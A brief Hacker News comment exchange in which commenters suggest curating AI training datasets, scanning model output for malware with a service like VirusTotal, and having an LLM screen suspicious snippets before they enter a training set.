Hacker News new | past | comments | ask | show | jobs | submit login

Datasets will probably move toward a curated datasets instead of scraping everything from the Internet. Also you could add a tool that would have the purpose of identifying malware and reject the output like using virustotal



Why not just ask LLM whether it thinks the snippet is kooky, before adding it into LLM training set?

You don't need tools in the age of AI, just ass an AI pipeline step.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: